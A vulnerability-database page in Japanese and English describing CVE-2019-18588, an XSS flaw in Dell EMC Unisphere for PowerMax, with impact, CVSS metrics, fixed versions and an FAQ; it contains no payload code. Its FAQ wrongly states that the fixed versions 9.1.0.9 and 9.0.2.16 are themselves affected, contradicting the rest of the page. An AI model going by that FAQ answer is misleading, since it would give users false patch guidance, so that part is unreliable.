無料スキャン
CRITICALCVE-2019-18588CVSS 9

Dell EMC Unisphere for PowerMax 9.1.0.9より前のバージョン、Dell EMC Unisphere for PowerMax 9.0.2.16より前のバージョン、およびDell EMC PowerMax OS 5978.221.221 および 5978.479.479 には、クロスサイトスクリプティング (XSS) が存在します。

プラットフォーム

other

コンポーネント

unisphere-for-powermax

修正版

9.1.0.9

9.0.2.16

AI Confidence: highNVDEPSS 0.5%レビュー済み: 2026年5月
NVDで見る
保存
あなたの言語に翻訳中…

CVE-2019-18588 describes a Cross-Site Scripting (XSS) vulnerability present in Dell EMC Unisphere for PowerMax versions prior to 9.1.0.9 and 9.0.2.16. This vulnerability allows an authenticated malicious user to inject JavaScript code, potentially compromising the sessions of other authenticated users. The vulnerability was published on January 10, 2020, and a fix is available in versions 9.1.0.9 and 9.0.2.16.

影響と攻撃シナリオ翻訳中…

The XSS vulnerability in Unisphere for PowerMax allows an authenticated attacker to inject arbitrary JavaScript code into web pages viewed by other authenticated users. This could lead to session hijacking, where the attacker gains control of another user's account. The attacker could also steal sensitive information displayed on the page, such as credentials or configuration data. Successful exploitation requires the attacker to be authenticated within the Unisphere environment, but once authenticated, the impact can be significant, potentially affecting multiple users and compromising the integrity of the PowerMax management interface. This type of XSS vulnerability can be particularly damaging in enterprise environments where privileged accounts are used.

悪用の状況翻訳中…

While no active exploitation campaigns have been publicly reported for CVE-2019-18588, the vulnerability's CRITICAL severity and the potential for session hijacking make it a high-priority concern. The vulnerability is not currently listed on CISA KEV. Public proof-of-concept exploits are not widely available, but the XSS nature of the vulnerability means that exploitation is likely possible with moderate effort. The published date indicates a relatively early disclosure, giving attackers ample time to develop and deploy exploits.

リスク対象者翻訳中…

Organizations utilizing Dell EMC Unisphere for PowerMax in environments where user authentication is required are at risk. This includes those with legacy configurations or deployments where input validation and output encoding are not adequately implemented. Shared hosting environments utilizing Unisphere for PowerMax are particularly vulnerable, as a compromised user account could potentially impact other tenants.

攻撃タイムライン

  1. Disclosure

    disclosure

脅威インテリジェンス

エクスプロイト状況

概念実証不明
CISA KEVNO
インターネット露出

EPSS

0.53% (67% パーセンタイル)

CVSS ベクトル

脅威インテリジェンス· CVSS 3.1CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H9.0CRITICALAttack VectorNetwork攻撃者がターゲットに到達する方法Attack ComplexityLow悪用に必要な条件Privileges RequiredLow攻撃に必要な認証レベルUser InteractionRequired被害者の操作が必要かどうかScopeChanged影響コンポーネント外への波及ConfidentialityHigh機密データ漏洩のリスクIntegrityHigh不正データ改ざんのリスクAvailabilityHighサービス障害のリスクnextguardhq.com · CVSS v3.1 基本スコア
これらのメトリクスの意味は?
Attack Vector
ネットワーク — インターネット経由でリモートから悪用可能。物理・ローカルアクセス不要。
Attack Complexity
低 — 特別な条件不要。安定して悪用可能。
Privileges Required
低 — 有効なユーザーアカウントがあれば十分。
User Interaction
必要 — 被害者がファイルを開く、リンクをクリックするなどのアクションが必要。
Scope
変化あり — 攻撃が脆弱なコンポーネントを超えて他のシステムに波及可能。
Confidentiality
高 — 機密性の完全喪失。全データが読み取り可能。
Integrity
高 — 任意のデータの書き込み・変更・削除が可能。
Availability
高 — 完全なクラッシュまたはリソース枯渇。完全なサービス拒否。

影響を受けるソフトウェア

コンポーネントunisphere-for-powermax
ベンダーDell
影響範囲修正版
unspecified – 9.1.0.89.1.0.9
unspecified – 9.0.2.159.0.2.16

弱点分類 (CWE)

CWE-79

タイムライン

  1. 予約済み
  2. 公開日
  3. 更新日
  4. EPSS 更新日

緩和策と回避策翻訳中…

The primary mitigation for CVE-2019-18588 is to upgrade Unisphere for PowerMax to version 9.1.0.9 or 9.0.2.16. Before upgrading, review the Dell EMC release notes for any potential compatibility issues or breaking changes. If an immediate upgrade is not possible, consider implementing strict input validation and output encoding on all user-supplied data within the Unisphere interface to reduce the attack surface. While not a complete fix, this can help prevent the injection of malicious scripts. Monitor Unisphere logs for any suspicious activity, such as unusual JavaScript execution patterns. After upgrading, confirm the fix by attempting to inject a simple JavaScript payload through the Unisphere interface and verifying that it is properly sanitized.

修正方法

Dell EMC Unisphere for PowerMax を 9.1.0.9 以降、または 9.0.2.16 以降のバージョンにアップデートしてください。これにより、クロスサイトスクリプティング (XSS) の脆弱性が修正されます。

CVEセキュリティニュースレター

脆弱性分析と重要アラートをメールでお届けします。

よくある質問翻訳中…

What is CVE-2019-18588 — XSS in Dell EMC Unisphere for PowerMax?

CVE-2019-18588 is a critical Cross-Site Scripting (XSS) vulnerability in Dell EMC Unisphere for PowerMax versions prior to 9.1.0.9 and 9.0.2.16, allowing authenticated attackers to inject JavaScript code.

Am I affected by CVE-2019-18588 in Dell EMC Unisphere for PowerMax?

You are affected if you are using Unisphere for PowerMax versions 9.1.0.9 or earlier, or 9.0.2.16 or earlier. Check your version against the affected versions listed in the advisory.

How do I fix CVE-2019-18588 in Dell EMC Unisphere for PowerMax?

Upgrade to version 9.1.0.9 or 9.0.2.16. Review Dell EMC release notes before upgrading to ensure compatibility.

Is CVE-2019-18588 being actively exploited?

While no active exploitation campaigns have been publicly reported, the vulnerability's severity and potential impact warrant immediate attention and remediation.

Where can I find the official Dell EMC advisory for CVE-2019-18588?

Refer to the Dell EMC Security Advisory for CVE-2019-18588 on the Dell Support website for detailed information and mitigation steps.

あなたのプロジェクトは影響を受けていますか?

依存関係ファイルをアップロードすれば、このCVEや他のCVEがあなたに影響するか即座にわかります。

無料スキャンCVEを検索